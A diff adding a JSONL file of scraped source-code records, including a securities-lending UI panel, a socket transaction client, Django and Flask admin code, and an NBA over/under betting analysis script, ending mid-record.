diff --git "a/3454.jsonl" "b/3454.jsonl" new file mode 100644--- /dev/null +++ "b/3454.jsonl" @@ -0,0 +1,656 @@ +{"seq_id":"3354389","text":"\"\"\" Compiled: 2020-09-18 10:38:55 \"\"\"\n\n#__src_file__ = \"extensions/SecuritiesLending/etc/FSecLendInventoryActiveLoansPanels.py\"\n\"\"\"------------------------------------------------------------------------------------------------\nMODULE\n FSecLendInventoryActiveLoansPanels\n\n (c) Copyright 2017 FIS FRONT ARENA. All rights reserved.\n\nDESCRIPTION\n Inventory View - Panel displaying the currently selected security loan instrument(s)\n and active trades/positions in them.\n\n------------------------------------------------------------------------------------------------\"\"\"\nimport acm\nfrom FEvent import EventCallback\nfrom FSecLendCommon import CommonSheetPanelBase\nimport FSecLendHooks\nfrom FSecLendUtils import ASQLPortfolioProvider, ActiveLoansBaseQuery\nfrom FSecLendEvents import OnInventoryViewInventoryViewPositionSelected\n\n\nclass SecLendInventoryActiveLoansPanel(CommonSheetPanelBase):\n\n def __init__(self):\n super(SecLendInventoryActiveLoansPanel, self).__init__()\n self._instrument = None\n\n def UpdateInventorySheetContents(self, instrument, status=None):\n if instrument:\n query = ActiveLoansBaseQuery()\n orNodeUnd = query.AddOpNode('OR')\n orNodeUnd.AddAttrNode('Instrument.Underlying.Name', 'EQUAL', instrument.Name())\n orNodePort = query.AddOpNode('OR')\n portfolio = FSecLendHooks.DefaultPortfolio()\n if portfolio:\n prtfs = portfolio.AllPhysicalPortfolios() if portfolio.IsKindOf(acm.FCompoundPortfolio) else [portfolio]\n for prtf in prtfs:\n orNodePort.AddAttrNode('Portfolio.Name', 'EQUAL', prtf.Name())\n if status:\n query.AddAttrNodeEnum('Status', status)\n folder = acm.FASQLQueryFolder()\n folder.Name('{0} - {1}'.format(instrument.Name(), portfolio.Name()))\n folder.AsqlQuery(query)\n asqlPortfolio = ASQLPortfolioProvider().GetOrCreateFromQuery(folder)\n self.SetSheetContents(asqlPortfolio)\n\n def SelectionChanged(self, selection):\n rowObjects = selection.SelectedRowObjects()\n if rowObjects:\n self.SendEvent(OnInventoryViewInventoryViewPositionSelected(self, rowObjects))\n\n def ClearPositionSelection(self):\n self.SendEvent(OnInventoryViewInventoryViewPositionSelected(self, None))\n\nclass SecLendInventoryActivePanel(SecLendInventoryActiveLoansPanel):\n\n def SetSheetContents(self, folder):\n self.Sheet().InsertObject(folder, 'IOAP_REPLACE')\n self.Sheet().RowTreeIterator(0).Tree().Expand(True, self.Settings().ExpandTreeLevels())\n rowIter = self.Sheet().RowTreeIterator(True).FirstChild()\n rowIter.Tree().VisibilityController().ShowZeroPositions(False)\n\n @EventCallback\n def OnInventoryViewInstrumentsSelected(self, event):\n \"\"\"Active should have all trades statues since it's a portfolio sheet. exclusion should be\n done in the valuation parameters.\"\"\"\n instrument = event.GetUnderlyingOrSelf()\n if self._instrument != instrument:\n self._instrument = instrument\n self.UpdateInventorySheetContents(instrument)\n self.ClearPositionSelection()\n\n\n\nclass SecLendInventoryPendingPanel(SecLendInventoryActiveLoansPanel):\n\n def SetSheetContents(self, folder):\n self.Sheet().InsertObject(folder, 'IOAP_REPLACE')\n self.Sheet().RowTreeIterator(0).Tree().Expand(True, self.Settings().ExpandTreeLevels())\n\n @EventCallback\n def OnInventoryViewInstrumentsSelected(self, event):\n \"\"\"Filter on trade status here since pending will have only the trades not yet\n settled\"\"\"\n instrument = event.GetUnderlyingOrSelf()\n if self._instrument != instrument:\n self._instrument = instrument\n self.UpdateInventorySheetContents(instrument, FSecLendHooks.FillTradeStatus())\n self.ClearPositionSelection()","sub_path":"Extensions/_securities_lending_py/FPythonCode/FSecLendInventoryActiveLoansPanels.py","file_name":"FSecLendInventoryActiveLoansPanels.py","file_ext":"py","file_size_in_byte":3956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"9585623","text":"import socket\nimport threading\nimport logging\nimport pickle\nimport sys\nimport json\nimport time\nimport datetime\n\n# macros\nCONFIG_FILE = 'config.json'\nSERVER = socket.gethostbyname(socket.gethostname())\nFORMAT = 'utf-8'\nLEADER_CHANGE = 'LEADER_CHANGE'\n\n\nclass Client:\n def __init__(self, port):\n ADDRESS = (SERVER, port)\n self.clientID = chr(ord('A') + (port % 6000))\n self.leader = 5051 # need to retrieve from state.cfg\n\n self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.server_socket.bind(ADDRESS)\n self.server_socket.listen()\n\n self.status = 1\n self.server_start = 0\n input_transactions = threading.Thread(target=self.inputTransactions)\n input_transactions.start()\n while True:\n connection, address = self.server_socket.accept()\n logging.debug(\"[CLIENT CONNECTED] {}\".format(str(connection)))\n\n listen_transactions = threading.Thread(target=self.listenTransactions, args=(connection, address))\n listen_transactions.start()\n\n def sendServer(self, message):\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n try:\n client.connect((SERVER, int(self.leader)))\n client.sendall(bytes(message))\n except socket.error as exc:\n logging.debug(\"[EXCEPTION] {}\".format(exc))\n client.close()\n\n def inputTransactions(self):\n print(\"Establishing connection with Servers\")\n while True:\n if self.status == 1:\n self.status = 0\n raw_type = input(\"Please enter your transaction:\")\n s = raw_type.split(' ')\n\n if s[1] == self.clientID:\n if s[0] == 'T' or s[0] == 't':\n logging.debug(\"[TRANSFER TRANSACTION] {}\".format(s))\n transaction = {'Type': 'CLIENT_MESSAGE', 'Transaction': 'T', 'S': s[1], 'R': s[2],\n 'A': int(s[3])}\n message = pickle.dumps(transaction)\n\n try:\n self.sendServer(message)\n except socket.error as exc:\n logging.debug(\"[EXCEPTION] {}\".format(exc))\n i = 0\n while self.status == 0:\n time.sleep(1)\n i = i + 1\n if i == 6:\n i = 0\n print(\"TIMEOUT! Trying again\")\n self.sendServer(message)\n\n elif s[0] == 'B' or s[0] == 'b':\n transaction = {'Type': 'CLIENT_MESSAGE', 'Transaction': 'B', 'S': self.clientID}\n logging.debug(\"[TRANSFER TRANSACTION] {}\".format(s))\n message = pickle.dumps(transaction)\n\n try:\n self.sendServer(message)\n except socket.error as exc:\n logging.debug(\"[EXCEPTION] {}\".format(exc))\n i = 0\n while self.status == 0:\n time.sleep(1)\n i = i + 1\n if i == 8:\n self.sendServer(message)\n\n else:\n print(\"Incorrect Transaction\")\n self.status = 1\n else:\n print(\"Incorrect Transaction\")\n self.status = 1\n\n def listenTransactions(self, connection, address):\n while True:\n msg = connection.recv(1024).decode(FORMAT)\n if 'NEW_LEADER' in msg:\n self.leader = msg.split(' ')[1]\n elif msg:\n print(msg)\n self.status = 1\n\n\nif __name__ == '__main__':\n PORT = sys.argv[1]\n logging.basicConfig(filename='Client' + str(PORT) + '.log', level=logging.DEBUG, filemode='w')\n client = Client(int(PORT))\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"583127493","text":"# Create your models here.\nfrom __future__ import unicode_literals\n\n# from country_regions.models import Region, Country\nfrom django.contrib.auth import get_user_model\nfrom django.db import models\n\nUser = get_user_model()\n\n\nclass AuditTrail(models.Model):\n created_by = models.ForeignKey(User, on_delete=models.CASCADE, related_name='audit_trail_created')\n created_at = models.DateTimeField(auto_now_add=True)\n updated_by = models.ForeignKey(User, on_delete=models.CASCADE, related_name='audit_trail_updated')\n updated_at = models.DateTimeField(auto_now=True)\n\n class Meta:\n abstract = True\n\n\nclass Skills(AuditTrail):\n name = models.CharField(max_length=30, unique=True)\n\n class Meta:\n ordering = ['name']\n\n def __str__(self):\n return f'{self.name}'\n\n\nclass MainSector(models.Model):\n name = models.CharField(max_length=30, unique=True)\n\n class Meta:\n ordering = ['name']\n\n def __str__(self):\n return f'{self.name}'\n\n\nclass SubSector(models.Model):\n main_sector = models.ForeignKey(MainSector, on_delete=models.CASCADE)\n name = models.CharField(max_length=30)\n\n class Meta:\n ordering = ['name']\n unique_together = [('main_sector', 'name')]\n\n def __str__(self):\n return f'{self.main_sector} : {self.name}'\n\n\nclass AbstractAddress(models.Model):\n # country = models.ForeignKey(Country, on_delete=models.CASCADE, help_text=\"Country\")\n # state = models.ForeignKey(Region, on_delete=models.CASCADE, blank=True, help_text=\"Region/State\")\n country = models.CharField(\n max_length=150,\n blank=True,\n default='',\n help_text=\"Country\"\n )\n state = models.CharField(\n max_length=150,\n blank=True,\n default='',\n help_text=\"Region/State\"\n )\n district = models.CharField(\n max_length=150,\n blank=True,\n default='',\n help_text=\"District\"\n )\n town_city = models.CharField(\n max_length=150,\n blank=True,\n default='',\n help_text=\"Village/Taluka/Town/City.\"\n )\n street_name = models.CharField(\n max_length=255,\n blank=True,\n default='',\n help_text=\"Street name\"\n )\n address_line = models.CharField(\n max_length=255,\n blank=True,\n help_text=\"House name/number\"\n )\n post_code = models.CharField(\n max_length=15,\n blank=True,\n default='',\n help_text=\"Post/ZIP code\"\n )\n plus_code = models.CharField(\n max_length=20,\n blank=True,\n default='',\n help_text=\"Plus code (https://maps.google.com/pluscodes/)\"\n )\n\n class Meta:\n abstract = True\n","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"146095637","text":"from flask import render_template, request, redirect, url_for, flash, abort\n\nfrom .. import routes\nfrom app.database.query import read_users, read_user_by_no, create_user, update_user, read_user_apps\nfrom app.database.models import User\nfrom app.util.forms import UserCreateFormAdmin, UserUpdateFormAdmin\nfrom app.util.roles import user_in_roles\n\n\n# 관리자 - 사용자 리스트\n@routes.route('/manage/users', methods=['GET'])\n@user_in_roles(['admin'])\ndef manage_users():\n condition_key = request.args.get('cond_key', '', type=str).strip()\n condition_value = request.args.get('cond_val', '', type=str).strip()\n\n page = request.args.get('page', 1, type=int)\n per_page = request.args.get('per_page', 10, type=int)\n\n users = read_users(page, per_page, condition_key, condition_value)\n return render_template('manage/users.html', users=users, condition_key=condition_key, condition_value=condition_value)\n\n\n# 관리자 - 사용자 상세\n@routes.route('/manage/users/', methods=['GET', 'POST'])\n@user_in_roles(['admin'])\ndef manage_user(user_no):\n if request.method == 'GET':\n user = read_user_by_no(user_no)\n if user is None and user_no != 'create':\n return abort(404)\n\n if user_no == 'create':\n form = UserCreateFormAdmin(obj=user)\n else:\n form = UserUpdateFormAdmin(obj=user)\n\n if request.method == 'POST':\n if request.form['action'] == 'update':\n form = UserUpdateFormAdmin(request.form)\n\n if request.form['action'] == 'create':\n form = UserCreateFormAdmin(request.form)\n\n if form.validate():\n user = User(\n USER_ID=form.USER_ID.data,\n USER_NM=form.USER_NM.data,\n USER_COMP=form.USER_COMP.data,\n USER_HP_NO=form.USER_HP_NO.data,\n USER_EMAIL=form.USER_EMAIL.data,\n USER_ROLE=form.USER_ROLE.data,\n )\n\n if form.USER_PW.data:\n user.set_password(form.USER_PW.data)\n\n if request.form['action'] == 'update':\n user.USER_NO = form.USER_NO.data\n user.APPROVAL = form.APPROVAL.data\n update_user(user)\n flash('사용자 데이터가 업데이트 되었습니다.')\n\n if request.form['action'] == 'create':\n user.APPROVAL = True\n create_user(user)\n flash('사용자가 추가되었습니다.')\n return redirect(url_for('routes.users'))\n\n return render_template('/manage/user.html', form=form)\n\n\n# 관리자 - 앱 사용자 리스트\n@routes.route('/manage/appusers', methods=['GET'])\n@user_in_roles(['admin'])\ndef manage_appusers():\n condition_key = request.args.get('cond_key', '', type=str).strip()\n condition_value = request.args.get('cond_val', '', type=str).strip()\n\n page = request.args.get('page', 1, type=int)\n per_page = request.args.get('per_page', 10, type=int)\n\n users = read_user_apps(page, per_page, condition_key, condition_value)\n return render_template('manage/appusers.html', users=users, condition_key=condition_key, condition_value=condition_value)\n","sub_path":"app/routes/manage/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":3198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"180742411","text":"import logging\nfrom django.conf import settings\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\n\nfrom ...forms.childminder_forms.form import HealthForm\nfrom ...models import Application, Arc, HealthDeclarationBooklet\nfrom ...review_util import redirect_selection, request_to_comment, save_comments\nfrom ...decorators import group_required, user_assigned_application\n\n# Initiate logging\nlog = logging.getLogger('')\n\n@login_required\n@group_required(settings.ARC_GROUP)\n@user_assigned_application\ndef health_check_answers(request):\n \"\"\"\n Method returning the template for the Your health: answers page (for a given application)\n displaying entered data for this task and navigating to the task list when successfully completed\n :param request: a request object used to generate the HttpResponse\n :return: an HttpResponse object with the rendered Your health: answers template\n \"\"\"\n table_name = 'HDB'\n\n if request.method == 'GET':\n application_id_local = request.GET[\"id\"]\n hdb_id = HealthDeclarationBooklet.objects.get(application_id=application_id_local).hdb_id\n form = HealthForm(table_keys=[hdb_id])\n\n elif request.method == 'POST':\n application_id_local = request.POST[\"id\"]\n hdb_id = HealthDeclarationBooklet.objects.get(application_id=application_id_local).hdb_id\n form = HealthForm(request.POST, table_keys=[hdb_id])\n\n if form.is_valid():\n comment_list = request_to_comment(hdb_id, table_name, form.cleaned_data)\n save_successful = save_comments(request, comment_list)\n\n if not comment_list:\n section_status = 'COMPLETED'\n else:\n section_status = 'FLAGGED'\n\n if save_successful:\n status = Arc.objects.get(pk=application_id_local)\n status.health_review = section_status\n status.save()\n default = '/dbs-check/summary/'\n redirect_link = redirect_selection(request, default)\n\n log.debug(\"Handling submissions for health declaration page - save successful\")\n return HttpResponseRedirect(settings.URL_PREFIX + redirect_link + '?id=' + application_id_local)\n\n else:\n log.debug(\"Handling submissions for health declaration page - save successful\")\n return render(request, '500.html')\n\n send_hdb_declare = HealthDeclarationBooklet.objects.get(application_id=application_id_local).send_hdb_declare\n application = Application.objects.get(pk=application_id_local)\n variables = {\n 'form': form,\n 'application_id': application_id_local,\n 'send_hdb_declare': send_hdb_declare,\n 'health_status': application.health_status,\n }\n\n log.debug(\"Rendering health declaration page\")\n return render(request, 'childminder_templates/health-check-answers.html', variables)\n","sub_path":"arc_application/views/childminder_views/health_declaration_booklet.py","file_name":"health_declaration_booklet.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"499093572","text":"#!/usr/bin/env python\n\n\n\"\"\"\nTHIS IS A SKELETON OF WHAT A NORMAL PYTHON SCRIPT SHOULD LOOK LIKE\n\"\"\"\n\nimport time, os, sys\nfrom datetime import datetime\nfrom optparse import OptionParser\nimport pandas as pd\nimport numpy as np\nimport Tutils\nimport NBA_utils\n\nfrom bokeh.plotting import figure, show, output_file, save\n\nTOOLS = \"pan,box_zoom,reset,save,box_select,undo,redo,crosshair\"\nHOME_TEAM = 'HomeTeam'\nHOME_TEAM_PTS = 'HomePoints'\nAWAY_TEAM = 'AwayTeam'\nAWAY_TEAM_PTS = 'AwayPoints'\n\n \ndef analyze_team_over_under(game_df):\n \"\"\"\n Look at the over under spreads for each team, not considering home/away\n \"\"\"\n # Get all of the teams that we have\n all_teams = game_df[HOME_TEAM].append(game_df[AWAY_TEAM]).unique().tolist()\n\n # Loop over each specific team, and see how games they play in compare to the over/under\n team_list = []\n home_over_list = []\n home_under_list = []\n home_perfect_list = []\n home_skipped_list = []\n away_over_list = []\n away_under_list = []\n away_perfect_list = []\n away_skipped_list = []\n \n for team in all_teams:\n # Get all home games for this team\n team_home_games = game_df[game_df[HOME_TEAM]==team]\n # Check the over/under spreads\n (home_over, home_under, home_perfect, home_skipped) = NBA_utils.analyze_over_under(team_home_games)\n \n # Get all away games for this team\n team_away_games = game_df[game_df[AWAY_TEAM]==team]\n # Check the over/under spreads\n (away_over, away_under, away_perfect, away_skipped) = NBA_utils.analyze_over_under(team_away_games)\n team_list.append(team)\n home_over_list.append(home_over)\n home_under_list.append(home_under)\n home_perfect_list.append(home_perfect)\n home_skipped_list.append(home_skipped)\n away_over_list.append(away_over)\n away_under_list.append(away_under)\n away_perfect_list.append(away_perfect)\n away_skipped_list.append(away_skipped)\n \n #print (\"Home games for team: %s\" % team)\n #print_over_under(home_over, home_under, home_perfect, home_skipped) \n #print (\"Away games for team: %s\" % team)\n #print_over_under(away_over, away_under, away_perfect, away_skipped)\n\n df = pd.DataFrame()\n df['Team'] = team_list\n df['Home_over_count'] = home_over_list\n df['Home_under_count'] = home_under_list\n df['Home_perfect_count'] = home_perfect_list\n df['Home_skipped_count'] = home_skipped_list\n df['Away_over_count'] = away_over_list\n df['Away_under_count'] = away_under_list\n df['Away_perfect_count'] = away_perfect_list\n df['Away_skipped_count'] = away_skipped_list \n df['Total_over_count'] = df['Home_over_count']+df['Away_over_count']\n df['Total_under_count'] = df['Home_under_count']+df['Away_under_count']\n df['Total_perfect_count'] = df['Home_perfect_count']+df['Away_perfect_count']\n df['Total_skipped_count'] = df['Home_skipped_count']+df['Away_skipped_count']\n out_file = \"Team_away_under_map.csv\"\n print (\"Writing team over under counts to %s\" % out_file)\n df.to_csv(out_file, columns = ['Team', 'Total_over_count', 'Total_under_count',\n 'Total_perfect_count'], index=False)\n \n\ndef plot_point_based_over_under(game_df):\n \"\"\"\n \"\"\"\n non_missing_df = game_df[pd.isnull(game_df['Over_Under_HIT'])==False]\n all_OUS = non_missing_df['predicted_over_under'].unique().tolist()\n #range_bins = range(195,230,5)\n for i in range(195,230,3):\n min_bound = i-3\n max_bound = i\n ou_line_df = non_missing_df[((abs(non_missing_df['predicted_over_under']) > min_bound) &\n (abs(non_missing_df['predicted_over_under']) <= max_bound))]\n print (min_bound, max_bound, len(ou_line_df), sum(ou_line_df['Over_Under_HIT']))\n #for OU_line in sorted(all_OUS):\n # ou_line_df = non_missing_df[non_missing_df['predicted_over_under']==OU_line]\n # print (OU_line, len(ou_line_df), sum(ou_line_df['Over_Under_HIT']))\n sys.exit()\n\ndef plot_over_under(game_df):\n # Drop all rows where there isn't a predicted_over_under\n game_df.dropna(subset=['predicted_over_under'], inplace=True)\n # Get count of how many games were over or under the spread\n sorted_df = game_df.sort_values(\"EpochDt\").reset_index()\n x_vals = []\n y_vals = []\n size_vals = [] \n new_col = []\n # Get a list of all unique dates for this dataframe\n all_dates = sorted_df['GameTime'].unique().tolist()\n num_dt = 0\n running_total = 0\n for dt in all_dates:\n dt_df = sorted_df[sorted_df['GameTime']==dt]\n daily_OU = []\n sample_size = 0\n for ind, row in dt_df.iterrows():\n if pd.isnull(row['predicted_over_under']):\n continue\n game_points = row[AWAY_TEAM_PTS] + row[HOME_TEAM_PTS]\n predicted_points = row['predicted_over_under']\n sample_size += 1\n # If the predicted points were less than the actual points\n if abs(game_points) > abs(predicted_points):\n daily_OU.append(1)\n elif abs(game_points) < abs(predicted_points):\n daily_OU.append(-1)\n num_dt+=1 \n if len(daily_OU) ==0:\n continue\n running_total += sum(daily_OU)\n x_vals.append(num_dt)\n y_vals.append(running_total)\n size_vals.append(sample_size*2)\n print (dt_df)\n p1 = figure(plot_width=1000, tools=TOOLS)\n p1.line(x_vals, y_vals, legend='Daily_Over_Under')\n p1.circle(x_vals, y_vals, fill_color='white', size=size_vals)\n\n show(p1)\n\ndef get_over_under_error(game_df): \n # Get count of how many games were over or under the spread\n error_list = []\n for ind, row in game_df.iterrows():\n if pd.isnull(row['predicted_over_under']):\n continue\n game_points = row[HOME_TEAM_PTS] + row[AWAY_TEAM_PTS]\n predicted_points = abs(row['predicted_over_under'])\n diff = abs(game_points - predicted_points)\n error_list.append(diff)\n \n return (sum(error_list)/len(error_list))\n\ndef get_team_points_map(game_df):\n \"\"\"\n \"\"\"\n # Key = team\n # Value = [home_points, allowed_points_at_home,\n # away_points, allowed_points_away,\n # avg_points, avg_allowed_points]\n points_map = {}\n \n \n # Get all of the teams that we have\n all_teams = game_df[HOME_TEAM].append(game_df[AWAY_TEAM]).unique().tolist()\n for team in all_teams:\n points_list = []\n # Get every game where this team is the home team\n team_home_df = game_df[game_df[HOME_TEAM]==team]\n home_points = team_home_df[HOME_TEAM_PTS].mean()\n points_list.append(home_points)\n allowed_home_points = team_home_df[AWAY_TEAM_PTS].mean()\n points_list.append(allowed_home_points)\n \n # Get every game where this team is the away team\n team_away_df = game_df[game_df[AWAY_TEAM]==team]\n away_points = team_away_df[AWAY_TEAM_PTS].mean()\n points_list.append(away_points)\n allowed_away_points = team_away_df[HOME_TEAM_PTS].mean()\n points_list.append(allowed_away_points)\n \n avg_scored_points = (home_points + away_points) / 2\n points_list.append(avg_scored_points)\n avg_allowed_points = (allowed_home_points + allowed_away_points) / 2\n points_list.append(avg_allowed_points)\n \n points_map[team] = points_list\n\n return points_map\n \n\n\ndef find_previous_game_home_team(row, ind, game_df):\n \"\"\"\n \"\"\"\n # Get all games for this team and sort them on 'Start (ET)'\n team_df = game_df[((game_df[HOME_TEAM] == row[HOME_TEAM]) |\n (game_df[AWAY_TEAM] == row[HOME_TEAM]))].sort_values('EpochDt')\n\n t_ind = ind\n while t_ind > 0:\n t_ind -= 1\n if t_ind in team_df.index:\n return team_df.loc[t_ind]\n\n return pd.DataFrame()\n\ndef find_previous_game_away_team(row, ind, game_df):\n \"\"\"\n \"\"\"\n # Get all games for this team and sort them on 'Start (ET)'\n team_df = game_df[((game_df[HOME_TEAM] == row[AWAY_TEAM]) |\n (game_df[AWAY_TEAM] == row[AWAY_TEAM]))].sort_values('EpochDt')\n\n t_ind = ind\n while t_ind > 0:\n t_ind -= 1\n if t_ind in team_df.index:\n return team_df.loc[t_ind]\n\n return pd.DataFrame()\n\n \n \ndef analyze_team_rest_over_under(game_df): \n \"\"\"\n \"\"\"\n time_sorted_df = game_df.sort_values('EpochDt').reset_index()\n for ind, row in time_sorted_df.iterrows():\n prev_home_team_game = find_previous_game_home_team(row, ind, time_sorted_df)\n prev_away_team_game = find_previous_game_away_team(row, ind, time_sorted_df) \n if len(prev_home_team_game) == 0:\n print (row)\n print (\"No previous home game\")\n print (\"------------------------------\")\n else:\n print (row)\n print (\"Previous_home_game ----------------\")\n print (prev_home_team_game)\n if len(prev_away_team_game) == 0:\n print (row)\n print (\"No previous away game\")\n print (\"------------------------------\") \n else:\n print (row)\n print (\"Previous_away_game ----------------\")\n print (prev_away_team_game)\n\n \ndef get_epoch_dt(row):\n game_date_str = str(int(row['GameTime']))\n return Tutils.tme2epoch(game_date_str, \"%Y%m%d\")\n\ndef print_statistics(game_df, out_file):\n \"\"\"\n \"\"\"\n print (\"Printing statistics to: %s\" % out_file)\n outF = open(out_file, \"w\")\n\n # Get the total over_under error\n total_over_under_error = get_over_under_error(game_df)\n outLine = \"Total over_under error: %s\\n\" % total_over_under_error\n outF.write(outLine)\n\n # Get actual team home and away points\n team_points_map = get_team_points_map(game_df)\n outLine = \"Team, AvgHomePoints, AvgAllowedHomePoints, AvgAwayPoints, AvgAllowedPointsAwway, AvgPointsScored, AvgAllowedPoints\\n\"\n outF.write(outLine)\n for t in team_points_map:\n outLine = \"%-25s,%3d,%3d,%3d,%3d,%3d,%3d\\n\" % (t, team_points_map[t][0], team_points_map[t][1],\n team_points_map[t][2], team_points_map[t][3],\n team_points_map[t][4], team_points_map[t][5])\n \n outF.write(outLine)\n \n outF.close()\n\ndef get_prior_home_game_avg(row, game_df, points_var, lookback_games):\n \"\"\"\n \"\"\"\n # Get a subset of the dataframe that is only for this teams home games\n home_game_df = game_df[((game_df[\"HomeTeam\"] == row[\"HomeTeam\"]) &\n (game_df[\"EpochDt\"] < row[\"EpochDt\"]))].reset_index()\n\n return home_game_df[points_var][-lookback_games:].mean()\n\ndef get_prior_away_game_avg(row, game_df, points_var, lookback_games):\n \"\"\"\n \"\"\"\n # Get a subset of the dataframe that is only for this teams home games\n away_game_df = game_df[((game_df[AWAY_TEAM] == row[AWAY_TEAM]) &\n (game_df[\"EpochDt\"] < row[\"EpochDt\"]))].reset_index()\n\n return away_game_df[points_var][-lookback_games:].mean()\n\ndef get_team_rest(row, game_df, key):\n \"\"\"\n \"\"\"\n # Get all games for this team\n team_df = game_df[((game_df[HOME_TEAM] == row[key]) | (game_df[AWAY_TEAM] == row[key]))]\n time_df = team_df[(team_df['EpochDt'] < row['EpochDt'])].reset_index()\n\n if len(time_df) == 0:\n return -1\n \n last_game = time_df.iloc[-1]['EpochDt']\n\n # Get difference in time\n time_diff_secs = row['EpochDt']-last_game\n\n # Return the time in days and round up to nearest day\n return (round(time_diff_secs/86400))\n\ndef analyze_betting_strats(game_df):\n \"\"\"\n \"\"\"\n # Add columns for points scored over past X games\n prior_games_to_avg = [1,3]\n for prior_game in prior_games_to_avg:\n var_key = \"HomeTeamPointsScoredPast_%d_HomeGame\" % prior_game\n game_df[var_key] = game_df.apply(lambda row: get_prior_home_game_avg(row, game_df, HOME_TEAM_PTS, prior_game),\n axis=1)\n var_key = \"AwayTeamPointsScoredPast_%d_AwayGame\" % prior_game\n game_df[var_key] = game_df.apply(lambda row: get_prior_away_game_avg(row, game_df, AWAY_TEAM_PTS, prior_game),\n axis=1)\n\n\n # Add columns for home and away team rest\n game_df[\"HomeRest\"] = game_df.apply(lambda row: get_team_rest(row, game_df, HOME_TEAM), axis=1)\n game_df[\"AwayRest\"] = game_df.apply(lambda row: get_team_rest(row, game_df, AWAY_TEAM), axis=1) \n\n rest_over_under_map = {}\n for ind, row in game_df.iterrows():\n # If there isn't a rest listed for one of the teams, skip\n if (row['HomeRest'] == -1) or (row['AwayRest'] == -1):\n continue\n total_rest = row['HomeRest'] + row['AwayRest']\n if total_rest not in rest_over_under_map:\n rest_over_under_map[total_rest] = []\n\n game_points = row[AWAY_TEAM_PTS] + row[HOME_TEAM_PTS]\n # Append 1 if it is over the predicted amnt, 0 if not\n if game_points > abs(row['predicted_over_under']):\n rest_over_under_map[total_rest].append(1)\n elif game_points < abs(row['predicted_over_under']):\n rest_over_under_map[total_rest].append(0)\n \n for key in sorted(rest_over_under_map):\n print (\"Total_Rest: %d\" % key)\n print (\"BeatOdds: %f\" % (sum(rest_over_under_map[key]) / len(rest_over_under_map[key])))\n print (\"SampleSize: %d\" % len(rest_over_under_map[key]))\n \n ## Test Over/Under strategy\n #strat_success_list = []\n #for ind, row in game_df.iterrows():\n # # Ignore if either of these are missing\n # if pd.isnull(row['HomeTeamPointsScoredPast_1_HomeGame'])==True or pd.isnull(row['AwayTeamPointsScoredPast_1_AwayGame'])==True:\n # continue\n # # Ignore if we don't have predicted values\n # if pd.isnull(row['predicted_over_under']):\n # continue\n # avg_points_scored_past_games = row['HomeTeamPointsScoredPast_1_HomeGame'] + row['AwayTeamPointsScoredPast_1_AwayGame']\n # game_points = row['AwayPoints'] + row[HOME_TEAM_PTS]\n\n # print (row)\n # print (\"Average_past_points: %f\" % avg_points_scored_past_games)\n # print (\"Game_Points: %f\" % game_points)\n # if avg_points_scored_past_games < abs(row['predicted_over_under']):\n # if game_points < abs(row['predicted_over_under']):\n # strat_success_list.append(1)\n # else:\n # strat_success_list.append(0)\n # elif avg_points_scored_past_games > abs(row['predicted_over_under']):\n # if game_points > abs(row['predicted_over_under']):\n # strat_success_list.append(1)\n # else:\n # strat_success_list.append(0)\n # print (\"Success/Fail: %s\" % strat_success_list[-1])\n #print (len(strat_success_list))\n #print (sum(strat_success_list)/len(strat_success_list))\n \n game_df.to_csv(\"tmp.csv\")\n \n\ndef process(game_dir, odds_dir, file_base, options):\n \"\"\"\n \"\"\"\n # First read the game file\n game_df = NBA_utils.read_OP_bball_dir(game_dir)\n game_df['EpochDt'] = game_df.apply(lambda row: get_epoch_dt(row), axis=1)\n\n \n # Read all of the odds files\n odds_df = NBA_utils.read_odds_dir(odds_dir, file_base)\n\n # Add the predicted_scores and predicted_over_under spreads to the game df\n NBA_utils.add_odds(game_df, odds_df)\n\n if options.statistics_file:\n print_statistics(game_df, options.statistics_file)\n sys.exit()\n print (\"Analyzing %d games\" % (len(game_df)))\n \n # Look at all over unders\n (over, under, perfect, skipped) = NBA_utils.add_over_under_col(game_df, \"HomePoints\", \"AwayPoints\", \"Over_Under_HIT\")\n NBA_utils.print_over_under(over, under, perfect, skipped)\n #plot_point_based_over_under(game_df)\n plot_over_under(game_df)\n\n # Look at team-specific over unders\n #analyze_team_over_under(game_df)\n\n # Find rest inbetween games\n # -- To see if teams who just recently played often beat the spread or not\n #analyze_team_rest_over_under(game_df)\n\n # Look at betting strategies\n #analyze_betting_strats(game_df)\n\n\ndef main():\n usage_str = \"%prog basketball_game_dir odds_dir file_base\"\n usage_str = \"%s\\n\\t basketball_game_dir : dir containing csv file containing final scores of the games\" % usage_str\n usage_str = \"%s\\n\\t odds_dir : directory with dated subdirs containing csv files of the odds\" % usage_str\n usage_str = \"%s\\n\\t file_base : basename of files to grab\" % usage_str \n parser = OptionParser(usage = usage_str)\n parser.add_option(\"-s\", \"--print_statistics\", dest=\"statistics_file\", help=\"Write statistic info to this file\")\n \n (options, args) = parser.parse_args()\n \n if len(args) < 3:\n parser.print_help()\n sys.exit(2)\n\n \n game_dir = args[0]\n odds_dir = args[1]\n file_base = args[2]\n\n process(game_dir, odds_dir, file_base, options)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/python/look_at_games.py","file_name":"look_at_games.py","file_ext":"py","file_size_in_byte":17311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"260938179","text":"#encoding: utf-8\nfrom OpenOrange import *\n\nParentSchedule = SuperClass(\"Schedule\",\"Record\",__file__)\nclass Schedule(ParentSchedule):\n \n def pasteTask(self):\n from UserTask import 